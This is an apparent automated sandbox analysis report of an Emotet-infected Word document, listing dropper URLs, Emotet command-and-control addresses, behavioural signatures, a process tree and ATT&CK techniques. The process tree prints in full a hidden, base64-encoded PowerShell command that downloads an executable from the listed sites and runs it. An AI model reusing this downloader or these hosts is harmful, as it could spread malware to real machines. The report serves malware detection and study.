Analysis

  • max time kernel
    144s
  • resource
    win10v191014
  • submitted
    09-12-2019 13:55

General

  • Target

    Docs_9d7f3caa367ce2f658699461660b4254.33.doc

  • Sample

    191209-gn2n6ql85x

  • SHA256

    918b8d165836e26ba2c38b5ea59b140cd7dd7d41244feedcc11856de22af244d

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.alfalah-ent.com/cms/a7rwpyxb9-k33-1101120868/

exe.dropper

https://raasset.com/x/crHctWU/

exe.dropper

http://alexandrearealty.com/tmp/OyjFYg/

exe.dropper

http://mehuaedxb.com/css/qIkFIs/

exe.dropper

http://mosaiclabel.com/4f9xnykaf/amz4jg4-x3i-459569728/

Extracted

Family

emotet

C2

24.27.122.202:80

67.171.182.231:80

190.171.135.235:80

103.9.145.19:8080

46.105.128.215:8080

172.105.213.30:80

69.30.205.162:7080

115.179.91.58:80

181.44.166.242:80

78.46.87.133:8080

81.213.145.45:443

83.156.88.159:80

210.111.160.220:80

195.191.107.67:80

192.241.220.183:8080

1.32.54.12:8080

192.161.190.171:8080

190.189.79.73:80

122.11.164.183:80

41.77.74.214:443

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Windows security modification 2 TTPs 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Drops file in System32 directory 6 IoCs
  • Drops file in Windows directory 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_9d7f3caa367ce2f658699461660b4254.33.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:4972
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABJAGwAdwB3AGsAZwBiAHIAcgA9ACcATQBsAHkAZABmAHQAcQBxAGgAJwA7ACQAVABpAHQAdQBjAGUAcgBzAGkAaQBzACAAPQAgACcAOQAzADgAJwA7ACQASQBvAGkAZgBiAHgAZAB6AGoAdQB2AGYAPQAnAE0AYwByAHQAeABiAGkAbgBpAHEAZgBuACcAOwAkAFkAYwBvAGQAbwBqAG4AeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVABpAHQAdQBjAGUAcgBzAGkAaQBzACsAJwAuAGUAeABlACcAOwAkAFMAYwB3AGkAdQByAG4AaQBjAGIAYQA9ACcAQgB3AHIAcQBzAGwAbgBoAG4AeQBvACcAOwAkAE0AbABtAGcAZgB1AHAAbwB4AGUAdQBwAHUAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAGIAQwBsAGkARQBuAHQAOwAkAEkAaABrAG8AbQBoAHQAYwA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAbABmAGEAbABhAGgALQBlAG4AdAAuAGMAbwBtAC8AYwBtAHMALwBhADcAcgB3AHAAeQB4AGIAOQAtAGsAMwAzAC0AMQAxADAAMQAxADIAMAA4ADYAOAAvACoAaAB0AHQAcABzADoALwAvAHIAYQBhAHMAcwBlAHQALgBjAG8AbQAvAHgALwBjAHIASABjAHQAVwBVAC8AKgBoAHQAdABwADoALwAvAGEAbABlAHgAYQBuAGQAcgBlAGEAcgBlAGEAbAB0AHkALgBjAG8AbQAvAHQAbQBwAC8ATwB5AGoARgBZAGcALwAqAGgAdAB0AHAAOgAvAC8AbQBlAGgAdQBhAGUAZAB4AGIALgBjAG8AbQAvAGMAcwBzAC8AcQBJAGsARgBJAHMALwAqAGgAdAB0AHAAOgAvAC8AbQBvAHMAYQBpAGMAbABhAGIAZQBsAC4AYwBvAG0ALwA0AGYAOQB4AG4AeQBrAGEAZgAvAGEAbQB6ADQAagBnADQALQB4ADMAaQAtADQANQA5ADUANgA5ADcAMgA4AC8AJwAuACIAUwBQAGAATABJAFQAIgAoACcAKgAnACkAOwAkAE0AdQBnAHIAegBuAGoAbwBnAGcAPQAnAEwAYgBkAGUAYQBxAHMAZABtAGcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAbgBnAGQAYgBpAGsAagBzAHEAbAAgAGkAbgAgACQASQBoAGsAbwBtAGgAdABjACkAewB0AHIAeQB7ACQATQBsAG0AZwBmAHUAcABvAHgAZQB1AHAAdQAuACIAZABPAHcAbgBMAGAATwBgAEEAZABmAGAASQBMAEUAIgAoACQAQwBuAGcAZABiAGkAawBqAHMAcQBsACwAIAAkAFkAYwBvAGQAbwBqAG4AeQApADsAJABBAG4AYwB6AGgAZQBkAGkAaQBpAGUAPQAnAEsAYgBuAGsAYQB1AHAAcwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFkAYwBvAGQAbwBqAG4AeQApAC4AIgBMAEUAYABOAGcAVABIACIAIAAtAGcAZQAgADIAMgA5ADIAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYABBAFIAdAAiACgAJABZAGMAbwBkAG8AagBuAHkAKQA7ACQASgBjAG4AaAB2AHcAegBmAGQAcAA9ACcATABrAGgAYwBkAHEAZQBkAHcAawAnADsAYgByAGUAYQBrADsAJABQAGYAdABtAGwAYgB4AHcAZwBzAHAAPQAnAFcAbQBsAGkAeQBwAG0AcwBwAGIAYQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABNAGMAegBkAG4AegBhAHgAcgBxAGQAbgA9ACcAUgB2AGYAdAB1AGIAbABnACcA
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4536
    • C:\Users\Admin\938.exe
      "C:\Users\Admin\938.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      PID:3772
      • C:\Users\Admin\938.exe
        --1d0cddc
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Drops file in System32 directory
        PID:4200
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4672
    • C:\Windows\System32\SLUI.exe
      "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
      2⤵
        PID:4708
    • C:\Windows\SysWOW64\memoraw.exe
      "C:\Windows\SysWOW64\memoraw.exe"
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      PID:4248
      • C:\Windows\SysWOW64\memoraw.exe
        --b17a2184
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Drops file in System32 directory
        PID:4880
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s BITS
      1⤵
      • Drops file in Windows directory
      PID:4288
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
      1⤵
        PID:3356
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
        1⤵
          PID:5060
        • \??\c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k unistacksvcgroup
          1⤵
            PID:3412
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
            1⤵
              PID:4520

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Defense Evasion

            Disabling Security Tools

            1
            T1089

            Modify Registry

            1
            T1112

            Discovery

            Query Registry

            3
            T1012

            System Information Discovery

            3
            T1082

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\938.exe
            • C:\Users\Admin\938.exe
            • C:\Users\Admin\938.exe
            • C:\Windows\SysWOW64\memoraw.exe
            • C:\Windows\SysWOW64\memoraw.exe
            • memory/3772-10-0x00000000022D0000-0x00000000022E7000-memory.dmp
              Filesize

              92KB

            • memory/4200-12-0x00000000021A0000-0x00000000021B7000-memory.dmp
              Filesize

              92KB

            • memory/4200-13-0x0000000000400000-0x00000000004A2000-memory.dmp
              Filesize

              648KB

            • memory/4248-15-0x0000000000620000-0x0000000000637000-memory.dmp
              Filesize

              92KB

            • memory/4880-28-0x0000000000740000-0x0000000000757000-memory.dmp
              Filesize

              92KB

            • memory/4880-29-0x0000000000400000-0x00000000004A2000-memory.dmp
              Filesize

              648KB